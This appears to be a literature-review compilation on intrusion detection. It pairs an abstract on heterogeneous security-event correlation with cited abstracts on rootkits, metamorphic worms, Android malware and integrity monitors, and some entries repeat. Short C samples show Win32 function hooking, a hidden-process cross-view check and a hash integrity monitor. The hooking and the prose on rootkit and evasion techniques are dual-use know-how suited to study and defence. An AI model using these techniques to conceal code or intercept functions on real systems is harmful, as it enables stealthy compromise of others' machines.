Improvements to Intrusion Detection could be achieved by embracing a more comprehensive approach in monitoring security events from many different heterogeneous sources. Correlating security events from heterogeneous sources can grant a more holistic view and greater situational awareness of cyber threats. One problem with this approach is that currently, even a single event source (e.g., network traffic) can experience Big Data challenges when considered alone. Attempts to use more heterogeneous data sources pose an even greater Big Data challenge. Big Data technologies for Intrusion Detection can help solve these Big Heterogeneous Data challenges. In this paper, we review the scope of works considering the problem of heterogeneous data and in particular Big Heterogeneous Data. We discuss the specific issues of Data Fusion, Heterogeneous Intrusion Detection Architectures, and Security Information and Event Management (SIEM) systems, as well as presenting areas where more research opportunities exist. Overall, both cyber threat analysis and cyber intelligence could be enhanced by correlating security events across many diverse heterogeneous sources. --- paper_title: Intrusion detection systems: A survey and taxonomy paper_content: This paper presents a taxonomy of intrusion detection systems that is then used to survey and classify a number of research prototypes. The taxonomy consists of a classification first of the detection principle, and second of certain operational aspects of the intrusion detection system as such. The systems are also grouped according to the increasing difficulty of the problem they attempt to address. These classifications are used predictively, pointing towards a number of areas of future research in the field of intrusion detection. --- paper_title: Anomaly-based network intrusion detection: Techniques, systems and challenges paper_content: The Internet and computer networks are exposed to an increasing number of security threats. With new types of attacks appearing continually, developing flexible and adaptive security oriented approaches is a severe challenge. In this context, anomaly-based network intrusion detection techniques are a valuable technology to protect target systems and networks against malicious activities. However, despite the variety of such methods described in the literature in recent years, security tools incorporating anomaly detection functionalities are just starting to appear, and several important problems remain to be solved. This paper begins with a review of the most well-known anomaly-based intrusion detection techniques. Then, available platforms, systems under development and research projects in the area are presented. Finally, we outline the main challenges to be dealt with for the wide scale deployment of anomaly-based intrusion detectors, with special emphasis on assessment issues. --- paper_title: Android Security: A Survey of Issues, Malware Penetration, and Defenses paper_content: Smartphones have become pervasive due to the availability of office applications, Internet, games, vehicle guidance using location-based services apart from conventional services such as voice calls, SMSes, and multimedia services. Android devices have gained huge market share due to the open architecture of Android and the popularity of its application programming interface (APIs) in the developer community. 
Increased popularity of the Android devices and associated monetary benefits attracted the malware developers, resulting in big rise of the Android malware apps between 2010 and 2014. Academic researchers and commercial antimalware companies have realized that the conventional signature-based and static analysis methods are vulnerable. In particular, the prevalent stealth techniques, such as encryption, code transformation, and environment-aware approaches, are capable of generating variants of known malware. This has led to the use of behavior-, anomaly-, and dynamic-analysis-based methods. Since a single approach may be ineffective against the advanced techniques, multiple complementary approaches can be used in tandem for effective malware detection. The existing reviews extensively cover the smartphone OS security. However, we believe that the security of Android, with particular focus on malware growth, study of antianalysis techniques, and existing detection methodologies, needs an extensive coverage. In this survey, we discuss the Android security enforcement mechanisms, threats to the existing security enforcements and related issues, malware growth timeline between 2010 and 2014, and stealth techniques employed by the malware authors, in addition to the existing detection methods. This review gives an insight into the strengths and shortcomings of the known research methodologies and provides a platform, to the researchers and practitioners, toward proposing the next-generation Android security, analysis, and malware detection techniques. --- paper_title: Outside the Closed World: On Using Machine Learning for Network Intrusion Detection paper_content: In network intrusion detection research, one popular strategy for finding attacks is monitoring a network's activity for anomalies: deviations from profiles of normality previously learned from benign traffic, typically identified using tools borrowed from the machine learning community. However, despite extensive academic research one finds a striking gap in terms of actual deployments of such systems: compared with other intrusion detection approaches, machine learning is rarely employed in operational "real world" settings. We examine the differences between the network intrusion detection problem and other areas where machine learning regularly finds much more success. Our main claim is that the task of finding attacks is fundamentally different from these other applications, making it significantly harder for the intrusion detection community to employ machine learning effectively. We support this claim by identifying challenges particular to network intrusion detection, and provide a set of guidelines meant to strengthen future research on anomaly detection. --- paper_title: Review: Intrusion detection by machine learning: A review paper_content: The popularity of using Internet contains some risks of network attacks. Intrusion detection is one major research problem in network security, whose aim is to identify unusual access or attacks to secure internal networks. In literature, intrusion detection systems have been approached by various machine learning techniques. However, there is no a review paper to examine and understand the current status of using machine learning techniques to solve the intrusion detection problems. This chapter reviews 55 related studies in the period between 2000 and 2007 focusing on developing single, hybrid, and ensemble classifiers. 
Related studies are compared by their classifier design, datasets used, and other experimental setups. Current achievements and limitations in developing intrusion detection systems by machine learning are present and discussed. A number of future research directions are also provided. --- paper_title: Survey on Android Rootkit paper_content: Rootkit can stealthily modify the code and data of operating system to achieve malicious goals,and it has long been a problem for computers.With increasingly equipped with operating systems,smart phones are as vulnerable to many of the same threats as computers.This paper analyzed the implementation of a SMS-based kernel-level Rootkit on Android system,described the attack behaviors of it,and put forward three effective detections such as EPA. --- paper_title: Copilot - a coprocessor-based kernel runtime integrity monitor paper_content: Copilot is a coprocessor-based kernel integrity monitor for commodity systems. Copilot is designed to detect malicious modifications to a host's kernel and has correctly detected the presence of 12 real-world rootkits, each within 30 seconds of their installation with less than a 1% penalty to the host's performance. Copilot requires no modifications to the protected host's software and can be expected to operate correctly even when the host kernel is thoroughly compromised - an advantage over traditional monitors designed to run on the host itself. --- paper_title: The design and implementation of tripwire: a file system integrity checker paper_content: At the heart of most computer systems is a file system. The file system contains user data, executable programs, configuration and authorization information, and (usually) the base executable version of the operating system itself. The ability to monitor file systems for unauthorized or unexpected changes gives system administrators valuable data for protecting and maintaining their systems. However, in environments of many networked heterogeneous platforms with different policies and software, the task of monitoring changes becomes quite daunting. Tripwire is tool that aids UNIX system administrators and users in monitoring a designated set of files and directories for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or altered files, so corrective actions may be taken in a timely manner. Tripwire may also be used on user or group files or databases to signal changes. This paper describes the design and implementation of the Tripwire tool. It uses interchangeable “signature” (usually, message digest) routines to identify changes in files, and is highly configurable. Tripwire is no-cost software, available on the Internet, and is currently in use on thousands of machines around the world. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. 
Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: Rootkits: Subverting the Windows Kernel paper_content: "It's imperative that everybody working in the field of cyber-security read this book to understand the growing threat of rootkits." --Mark Russinovich, editor, Windows IT Pro / Windows & .NET Magazine"This material is not only up-to-date, it defines up-to-date. It is truly cutting-edge. As the only book on the subject, Rootkits will be of interest to any Windows security researcher or security programmer. It's detailed, well researched and the technical information is excellent. The level of technical detail, research, and time invested in developing relevant examples is impressive. In one word: Outstanding." --Tony Bautts, Security Consultant; CEO, Xtivix, Inc."This book is an essential read for anyone responsible for Windows security. Security professionals, Windows system administrators, and programmers in general will want to understand the techniques used by rootkit authors. At a time when many IT and security professionals are still worrying about the latest e-mail virus or how to get all of this month's security patches installed, Mr. Hoglund and Mr. Butler open your eyes to some of the most stealthy and significant threats to the Windows operating system. Only by understanding these offensive techniques can you properly defend the networks and systems for which you are responsible." --Jennifer Kolde, Security Consultant, Author, and Instructor"What's worse than being owned? Not knowing it. Find out what it means to be owned by reading Hoglund and Butler's first-of-a-kind book on rootkits. At the apex the malicious hacker toolset--which includes decompilers, disassemblers, fault-injection engines, kernel debuggers, payload collections, coverage tools, and flow analysis tools--is the rootkit. 
Beginning where Exploiting Software left off, this book shows how attackers hide in plain sight. "Rootkits are extremely powerful and are the next wave of attack technology. Like other types of malicious code, rootkits thrive on stealthiness. They hide away from standard system observers, employing hooks, trampolines, and patches to get their work done. Sophisticated rootkits run in such a way that other programs that usually monitor machine behavior can't easily detect them. A rootkit thus provides insider access only to people who know that it is running and available to accept commands. Kernel rootkits can hide files and running processes to provide a backdoor into the target machine. "Understanding the ultimate attacker's tool provides an important motivator for those of us trying to defend systems. No authors are better suited to give you a detailed hands-on understanding of rootkits than Hoglund and Butler. Better to own this book than to be owned." --Gary McGraw, Ph.D., CTO, Cigital, coauthor of Exploiting Software (2004) and Building Secure Software (2002), both from Addison-Wesley"Greg and Jamie are unquestionably the go-to experts when it comes to subverting the Windows API and creating rootkits. These two masters come together to pierce the veil of mystery surrounding rootkits, bringing this information out of the shadows. Anyone even remotely interested in security for Windows systems, including forensic analysis, should include this book very high on their must-read list." --Harlan Carvey, author of Windows Forensics and Incident Recovery (Addison-Wesley, 2005)Rootkits are the ultimate backdoor, giving hackers ongoing and virtually undetectable access to the systems they exploit. Now, two of the world's leading experts have written the first comprehensive guide to rootkits: what they are, how they work, how to build them, and how to detect them. Rootkit.com's Greg Hoglund and James Butler created and teach Black Hat's legendary course in rootkits. In this book, they reveal never-before-told offensive aspects of rootkit technology--learn how attackers can get in and stay in for years, without detection.Hoglund and Butler show exactly how to subvert the Windows XP and Windows 2000 kernels, teaching concepts that are easily applied to virtually any modern operating system, from Windows Server 2003 to Linux and UNIX. Using extensive downloadable examples, they teach rootkit programming techniques that can be used for a wide range of software, from white hat security tools to operating system drivers and debuggers.After reading this book, readers will be able to Understand the role of rootkits in remote command/control and software eavesdropping Build kernel rootkits that can make processes, files, and directories invisible Master key rootkit programming techniques, including hooking, runtime patching, and directly manipulating kernel objects Work with layered drivers to implement keyboard sniffers and file filters Detect rootkits and build host-based intrusion prevention software that resists rootkit attacksVisit rootkit.com for code and programs from this book. The site also contains enhancements to the book's text, such as up-to-the-minute information on rootkits available nowhere else. --- paper_title: Modern Operating Systems paper_content: For software development professionals and computer science students, Modern Operating Systems gives a solid conceptual overview of operating system design, including detailed case studies of Unix/Linux and Windows 2000. 
What makes an operating system modern? According to author Andrew Tanenbaum, it is the awareness of high-demand computer applications--primarily in the areas of multimedia, parallel and distributed computing, and security. The development of faster and more advanced hardware has driven progress in software, including enhancements to the operating system. It is one thing to run an old operating system on current hardware, and another to effectively leverage current hardware to best serve modern software applications. If you don't believe it, install Windows 3.0 on a modern PC and try surfing the Internet or burning a CD. Readers familiar with Tanenbaum's previous text, Operating Systems, know the author is a great proponent of simple design and hands-on experimentation. His earlier book came bundled with the source code for an operating system called Minux, a simple variant of Unix and the platform used by Linus Torvalds to develop Linux. Although this book does not come with any source code, he illustrates many of his points with code fragments (C, usually with Unix system calls). The first half of Modern Operating Systems focuses on traditional operating systems concepts: processes, deadlocks, memory management, I/O, and file systems. There is nothing groundbreaking in these early chapters, but all topics are well covered, each including sections on current research and a set of student problems. It is enlightening to read Tanenbaum's explanations of the design decisions made by past operating systems gurus, including his view that additional research on the problem of deadlocks is impractical except for "keeping otherwise unemployed graph theorists off the streets." It is the second half of the book that differentiates itself from older operating systems texts. Here, each chapter describes an element of what constitutes a modern operating system--awareness of multimedia applications, multiple processors, computer networks, and a high level of security. The chapter on multimedia functionality focuses on such features as handling massive files and providing video-on-demand. Included in the discussion on multiprocessor platforms are clustered computers and distributed computing. Finally, the importance of security is discussed--a lively enumeration of the scores of ways operating systems can be vulnerable to attack, from password security to computer viruses and Internet worms. Included at the end of the book are case studies of two popular operating systems: Unix/Linux and Windows 2000. There is a bias toward the Unix/Linux approach, not surprising given the author's experience and academic bent, but this bias does not detract from Tanenbaum's analysis. Both operating systems are dissected, describing how each implements processes, file systems, memory management, and other operating system fundamentals. Tanenbaum's mantra is simple, accessible operating system design. Given that modern operating systems have extensive features, he is forced to reconcile physical size with simplicity. Toward this end, he makes frequent references to the Frederick Brooks classic The Mythical Man-Month for wisdom on managing large, complex software development projects. He finds both Windows 2000 and Unix/Linux guilty of being too complicated--with a particular skewering of Windows 2000 and its "mammoth Win32 API." A primary culprit is the attempt to make operating systems more "user-friendly," which Tanenbaum views as an excuse for bloated code. 
The solution is to have smart people, the smallest possible team, and well-defined interactions between various operating systems components. Future operating system design will benefit if the advice in this book is taken to heart. --Pete Ostenson --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: Rootkits: Subverting the Windows Kernel paper_content: "It's imperative that everybody working in the field of cyber-security read this book to understand the growing threat of rootkits." --Mark Russinovich, editor, Windows IT Pro / Windows & .NET Magazine"This material is not only up-to-date, it defines up-to-date. It is truly cutting-edge. As the only book on the subject, Rootkits will be of interest to any Windows security researcher or security programmer. It's detailed, well researched and the technical information is excellent. The level of technical detail, research, and time invested in developing relevant examples is impressive. In one word: Outstanding." --Tony Bautts, Security Consultant; CEO, Xtivix, Inc."This book is an essential read for anyone responsible for Windows security. Security professionals, Windows system administrators, and programmers in general will want to understand the techniques used by rootkit authors. 
At a time when many IT and security professionals are still worrying about the latest e-mail virus or how to get all of this month's security patches installed, Mr. Hoglund and Mr. Butler open your eyes to some of the most stealthy and significant threats to the Windows operating system. Only by understanding these offensive techniques can you properly defend the networks and systems for which you are responsible." --Jennifer Kolde, Security Consultant, Author, and Instructor"What's worse than being owned? Not knowing it. Find out what it means to be owned by reading Hoglund and Butler's first-of-a-kind book on rootkits. At the apex the malicious hacker toolset--which includes decompilers, disassemblers, fault-injection engines, kernel debuggers, payload collections, coverage tools, and flow analysis tools--is the rootkit. Beginning where Exploiting Software left off, this book shows how attackers hide in plain sight. "Rootkits are extremely powerful and are the next wave of attack technology. Like other types of malicious code, rootkits thrive on stealthiness. They hide away from standard system observers, employing hooks, trampolines, and patches to get their work done. Sophisticated rootkits run in such a way that other programs that usually monitor machine behavior can't easily detect them. A rootkit thus provides insider access only to people who know that it is running and available to accept commands. Kernel rootkits can hide files and running processes to provide a backdoor into the target machine. "Understanding the ultimate attacker's tool provides an important motivator for those of us trying to defend systems. No authors are better suited to give you a detailed hands-on understanding of rootkits than Hoglund and Butler. Better to own this book than to be owned." --Gary McGraw, Ph.D., CTO, Cigital, coauthor of Exploiting Software (2004) and Building Secure Software (2002), both from Addison-Wesley"Greg and Jamie are unquestionably the go-to experts when it comes to subverting the Windows API and creating rootkits. These two masters come together to pierce the veil of mystery surrounding rootkits, bringing this information out of the shadows. Anyone even remotely interested in security for Windows systems, including forensic analysis, should include this book very high on their must-read list." --Harlan Carvey, author of Windows Forensics and Incident Recovery (Addison-Wesley, 2005)Rootkits are the ultimate backdoor, giving hackers ongoing and virtually undetectable access to the systems they exploit. Now, two of the world's leading experts have written the first comprehensive guide to rootkits: what they are, how they work, how to build them, and how to detect them. Rootkit.com's Greg Hoglund and James Butler created and teach Black Hat's legendary course in rootkits. In this book, they reveal never-before-told offensive aspects of rootkit technology--learn how attackers can get in and stay in for years, without detection.Hoglund and Butler show exactly how to subvert the Windows XP and Windows 2000 kernels, teaching concepts that are easily applied to virtually any modern operating system, from Windows Server 2003 to Linux and UNIX. 
Using extensive downloadable examples, they teach rootkit programming techniques that can be used for a wide range of software, from white hat security tools to operating system drivers and debuggers.After reading this book, readers will be able to Understand the role of rootkits in remote command/control and software eavesdropping Build kernel rootkits that can make processes, files, and directories invisible Master key rootkit programming techniques, including hooking, runtime patching, and directly manipulating kernel objects Work with layered drivers to implement keyboard sniffers and file filters Detect rootkits and build host-based intrusion prevention software that resists rootkit attacksVisit rootkit.com for code and programs from this book. The site also contains enhancements to the book's text, such as up-to-the-minute information on rootkits available nowhere else.
--- paper_title: Detours: Binary Interception of Win32 Functions paper_content: Innovative systems research hinges on the ability to easily instrument and extend existing operating system and application functionality. With access to appropriate source code, it is often trivial to insert new instrumentation or extensions by rebuilding the OS or application. However, in today's world of commercial software, researchers seldom have access to all relevant source code. We present Detours, a library for instrumenting arbitrary Win32 functions on x86 machines. Detours intercepts Win32 functions by re-writing target function images. The Detours package also contains utilities to attach arbitrary DLLs and data segments (called payloads) to any Win32 binary. While prior researchers have used binary rewriting to insert debugging and profiling instrumentation, to our knowledge, Detours is the first package on any platform to logically preserve the un-instrumented target function (callable through a trampoline) as a subroutine for use by the instrumentation. Our unique trampoline design is crucial for extending existing binary software. We describe our experiences using Detours to create an automatic distributed partitioning system, to instrument and analyze the DCOM protocol stack, and to create a thunking layer for a COM-based OS API. Micro-benchmarks demonstrate the efficiency of the Detours library.
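To make the trampoline-based interception described in the Detours entry above concrete, the following is a minimal user-mode sketch using the public Detours API (DetourTransactionBegin, DetourAttach, and related calls). The choice of Sleep as the target and the logging are illustrative only; building it assumes the Detours headers and library are available.

```c
/* Illustrative sketch of Win32 API interception in the style of Detours.
 * Assumes the Microsoft Detours package (detours.h / detours.lib) is available;
 * the hooked target (Sleep) and the logging are arbitrary choices for this example. */
#include <windows.h>
#include <stdio.h>
#include "detours.h"

/* Pointer through which the original (trampoline) Sleep can still be reached. */
static VOID (WINAPI *TrueSleep)(DWORD dwMilliseconds) = Sleep;

/* Replacement function: runs instead of Sleep, then calls the trampoline. */
static VOID WINAPI HookedSleep(DWORD dwMilliseconds)
{
    printf("Sleep(%lu) intercepted\n", (unsigned long)dwMilliseconds);
    TrueSleep(dwMilliseconds);          /* preserved, un-instrumented target */
}

int main(void)
{
    /* Install the detour: the target's prologue is rewritten to jump to HookedSleep. */
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourAttach((PVOID *)&TrueSleep, (PVOID)HookedSleep);
    DetourTransactionCommit();

    Sleep(100);                         /* now routed through HookedSleep */

    /* Remove the detour again. */
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourDetach((PVOID *)&TrueSleep, (PVOID)HookedSleep);
    DetourTransactionCommit();
    return 0;
}
```

The point the abstract emphasizes is visible in the sketch: the original function stays callable through the trampoline pointer (TrueSleep), so the instrumentation extends rather than replaces the target.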
--- paper_title: Operating System Interface Obfuscation and the Revealing of Hidden Operations paper_content: Many software security solutions--including malware analyzers, information flow tracking systems, auditing utilities, and host-based intrusion detectors--rely on knowledge of standard system call interfaces to reason about process execution behavior. In this work, we show how a rootkit can obfuscate a commodity kernel's system call interfaces to degrade the effectiveness of these tools. Our attack, called Illusion, allows user-level malware to invoke privileged kernel operations without requiring the malware to call the actual system calls corresponding to the operations. The Illusion interface hides system operations from user-, kernel-, and hypervisor-level monitors mediating the conventional system-call interface. Illusion alters neither static kernel code nor read-only dispatch tables, remaining elusive from tools protecting kernel memory. We then consider the problem of Illusion attacks and augment system call data with kernel-level execution information to expose the hidden kernel operations. We present a Xen-based monitoring system, Sherlock, that adds kernel execution watchpoints to the stream of system calls. Sherlock automatically adapts its sensitivity based on security requirements to remain performant on desktop systems: in normal execution, it adds 1% to 10% overhead to a variety of workloads.
--- paper_title: Detecting Kernel-Level Rootkits Using Data Structure Invariants paper_content: Rootkits affect system security by modifying kernel data structures to achieve a variety of malicious goals. While early rootkits modified control data structures, such as the system call table and values of function pointers, recent work has demonstrated rootkits that maliciously modify noncontrol data. Most prior techniques for rootkit detection have focused solely on detecting control data modifications and, therefore, fail to detect such rootkits. This paper presents a novel technique to detect rootkits that modify both control and noncontrol data. The main idea is to externally observe the execution of the kernel during an inference phase and hypothesize invariants on kernel data structures. A rootkit detection phase uses these invariants as specifications of data structure integrity. During this phase, violation of invariants indicates an infection. We have implemented Gibraltar, a prototype tool that infers kernel data structure invariants and uses them to detect rootkits. Experiments show that Gibraltar can effectively detect previously known rootkits, including those that modify noncontrol data structures.
--- paper_title: Detecting stealth software with Strider GhostBuster paper_content: Stealth malware programs that silently infect enterprise and consumer machines are becoming a major threat to the future of the Internet. Resource hiding is a powerful stealth technique commonly used by malware to evade detection by computer users and anti-malware scanners. In this paper, we focus on a subclass of malware, termed "ghostware", which hide files, configuration settings, processes, and loaded modules from the operating system's query and enumeration application programming interfaces (APIs). Instead of targeting individual stealth implementations, we describe a systematic framework for detecting multiple types of hidden resources by leveraging the hiding behavior as a detection mechanism. Specifically, we adopt a cross-view diff-based approach to ghostware detection by comparing a high-level infected scan with a low-level clean scan and alternatively comparing an inside-the-box infected scan with an outside-the-box clean scan. We describe the design and implementation of the Strider GhostBuster tool and demonstrate its efficiency and effectiveness in detecting resources hidden by real-world malware such as rootkits, Trojans, and key-loggers.
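The cross-view diff idea in the GhostBuster entry above can be illustrated with a small user-space check. The sketch below is a simplified Linux analogue, not the paper's Windows implementation: it compares the high-level view of processes (the /proc listing) against a lower-level probe (kill with signal 0) and flags PIDs visible to one view but not the other. The fixed PID range is an assumption for brevity, and a rootkit that also filters the probe would of course evade this particular check.

```c
/* Toy cross-view check, loosely inspired by the GhostBuster approach:
 * compare the /proc directory listing (high-level view) against direct
 * PID probing with kill(pid, 0) (lower-level view).  A PID that answers
 * the probe but does not appear in /proc is a candidate hidden process.
 * The 1..32768 range and the use of kill() are illustrative choices. */
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <ctype.h>
#include <sys/types.h>

#define MAX_PID 32768

int main(void)
{
    static unsigned char in_proc[MAX_PID + 1] = {0};
    struct dirent *de;
    DIR *proc = opendir("/proc");
    if (!proc) { perror("opendir /proc"); return 1; }

    /* High-level view: every numeric directory name under /proc is a PID. */
    while ((de = readdir(proc)) != NULL) {
        if (isdigit((unsigned char)de->d_name[0])) {
            long pid = strtol(de->d_name, NULL, 10);
            if (pid > 0 && pid <= MAX_PID)
                in_proc[pid] = 1;
        }
    }
    closedir(proc);

    /* Low-level view: probe each PID directly.  kill(pid, 0) delivers no
     * signal but reports whether the process exists (EPERM also means it exists). */
    for (long pid = 1; pid <= MAX_PID; pid++) {
        int exists = (kill((pid_t)pid, 0) == 0) || (errno == EPERM);
        if (exists && !in_proc[pid])
            printf("PID %ld answers probes but is missing from /proc\n", pid);
    }
    return 0;
}
```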
--- paper_title: Metamorphic worm that carries its own morphing engine paper_content: Metamorphic malware changes its internal structure across generations, but its functionality remains unchanged. Well-designed metamorphic malware will evade signature detection. Recent research has revealed techniques based on hidden Markov models (HMMs) for detecting many types of metamorphic malware, as well as techniques for evading such detection. A worm is a type of malware that actively spreads across a network to other host systems. In this project we design and implement a prototype metamorphic worm that carries its own morphing engine. This is challenging, since the morphing engine itself must be morphed across replications, which imposes restrictions on the structure of the worm. Our design employs previously developed techniques to evade detection. We provide test results to confirm that this worm effectively evades signature and HMM-based detection, and we consider possible detection strategies. This worm provides a concrete example that should prove useful for additional metamorphic detection research.
--- paper_title: Evaluation of Android Anti-malware Techniques against Dalvik Bytecode Obfuscation paper_content: Popularity and growth of Android mobile devices has paved the way for exploiting popular apps using various Dalvik byte code transformation methods. Testing the antimalware techniques against obfuscation identifies the need of proposing effective detection methods. In this paper, we explore the resilience of anti-malware techniques against transformations for Android. The Proposed approach employs variable compression, native code wrapping and register renaming, in addition to already implemented transformations on Dalvik byte code. Evaluation results indicate low resilience of the antimalware detection engines against code obfuscation. Furthermore, we evaluate resilience of Androguard's code similarity and AndroSimilar's robust statistical feature signature against code obfuscated malware.
--- paper_title: Code mutation techniques by means of formal grammars and automatons paper_content: The paper describes formalization of existing code mutation techniques widely used in a viruses (polymorphism and metamorphism) by means of formal grammars and automatons. New model of metamorphic viruses and new classification of this type of viruses are suggested. The statement about undetectable viruses of this type is proved. In that paper are shown iterative approach toward construct complex formal grammars from the simplest initial rules for building metamorphic generator. Also there are some samples of applied usage of formal grammar model. The experiment for system call tracing of some viruses and worms is described. Possibility of using system call sequences for viruses detecting is shown.
--- paper_title: Hunting for metamorphic paper_content: As virus writers developed numerous polymorphic engines, virus scanners became stronger in their defense against them. A virus scanner which used a code emulator to detect viruses looked like it was on steroids compared to those without an emulator-based scanning engine. Nowadays, most polymorphic viruses are considered boring. Even though they can be extremely hard to detect, most of today’s products are able to deal with them relatively easily. These are the scanners that survived the DOS polymorphic days. For some of the scanners DOS polymorphic viruses meant the ‘end of days’. Other scanners died with the macro virus problem. For most products the next challenge to take is 32-bit metamorphosis. Metamorphic viruses are nothing new. We have seen them in DOS days, though some of them, like ACG, already used 32-bit instructions. The next step is 32-bit metamorphosis under Windows environments. Virus writers already took the first step in that direction. In this paper the authors will examine metamorphic engines to provide a better general understanding of the problem that we are facing. The authors also provide detection examples of some of the metamorphic viruses.
--- paper_title: DroidAnalyst: Synergic App Framework for Static and Dynamic App Analysis paper_content: Evolution of mobile devices, availability of additional resources coupled with enhanced functionality has leveraged smartphone to substitute the conventional computing devices. Mobile device users have adopted smartphones for online payments, sending emails, social networking, and stores the user sensitive information. The ever increasing mobile devices has attracted malware authors and cybercriminals to target mobile platforms. Android, the most popular open source mobile OS is being targeted by the malware writers. In particular, less monitored third party markets are being used as infection and propagation sources. Given the threats posed by the increasing number of malicious apps, security researchers must be able to analyze the malware quickly and efficiently; this may not be feasible with the manual analysis. Hence, automated analysis techniques for app vetting and malware detection are necessary. In this chapter, we present DroidAnalyst, a novel automated app vetting and malware analysis framework that integrates the synergy of static and dynamic analysis to improve accuracy and efficiency of analysis. DroidAnalyst generates a unified analysis model that combines the strengths of the complementary approaches with multiple detection methods, to increase the app code analysis. We have evaluated our proposed solution DroidAnalyst against a reasonable dataset consisting real-world benign and malware apps.
--- paper_title: Copilot - a coprocessor-based kernel runtime integrity monitor paper_content: Copilot is a coprocessor-based kernel integrity monitor for commodity systems. Copilot is designed to detect malicious modifications to a host's kernel and has correctly detected the presence of 12 real-world rootkits, each within 30 seconds of their installation with less than a 1% penalty to the host's performance. Copilot requires no modifications to the protected host's software and can be expected to operate correctly even when the host kernel is thoroughly compromised - an advantage over traditional monitors designed to run on the host itself.
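The Copilot entry above describes hashing the host kernel's text and jump tables from an independent coprocessor. The sketch below shows only the monitoring loop of such a design in ordinary C: take a baseline hash of a region that should never change, re-hash it periodically, and report divergence. The in-process buffer, the FNV-1a hash, and the simulated tampering are stand-ins for the PCI-based memory reads and cryptographic hashes a real monitor would use.

```c
/* Minimal illustration of hash-based integrity monitoring in the spirit of
 * Copilot: record a baseline hash of a region that should never change, then
 * periodically re-hash it and report any deviation.  Here the "protected
 * region" is just a buffer in this process; Copilot itself reads host kernel
 * memory over the PCI bus from a separate coprocessor. */
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

static uint64_t fnv1a(const unsigned char *data, size_t len)
{
    uint64_t h = 0xcbf29ce484222325ULL;         /* FNV-1a offset basis */
    for (size_t i = 0; i < len; i++) {
        h ^= data[i];
        h *= 0x100000001b3ULL;                  /* FNV-1a prime */
    }
    return h;
}

static unsigned char protected_region[4096];    /* stand-in for kernel text */

int main(void)
{
    uint64_t baseline = fnv1a(protected_region, sizeof protected_region);

    for (int round = 0; round < 3; round++) {
        if (round == 2)
            protected_region[100] = 0xCC;       /* simulate tampering */

        uint64_t now = fnv1a(protected_region, sizeof protected_region);
        printf("round %d: %s\n", round,
               now == baseline ? "region unchanged" : "INTEGRITY VIOLATION");
    }
    return 0;
}
```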
--- paper_title: A Virtual Machine Introspection Based Architecture for Intrusion Detection paper_content: Today’s architectures for intrusion detection force the IDS designer to make a difficult choice. If the IDS resides on the host, it has an excellent view of what is happening in that host’s software, but is highly susceptible to attack. On the other hand, if the IDS resides in the network, it is more resistant to attack, but has a poor view of what is happening inside the host, making it more susceptible to evasion. In this paper we present an architecture that retains the visibility of a host-based IDS, but pulls the IDS outside of the host for greater attack resistance. We achieve this through the use of a virtual machine monitor. Using this approach allows us to isolate the IDS from the monitored host but still retain excellent visibility into the host’s state. The VMM also offers us the unique ability to completely mediate interactions between the host software and the underlying hardware. We present a detailed study of our architecture, including Livewire, a prototype implementation. We demonstrate Livewire by implementing a suite of simple intrusion detection policies and using them to detect real attacks.
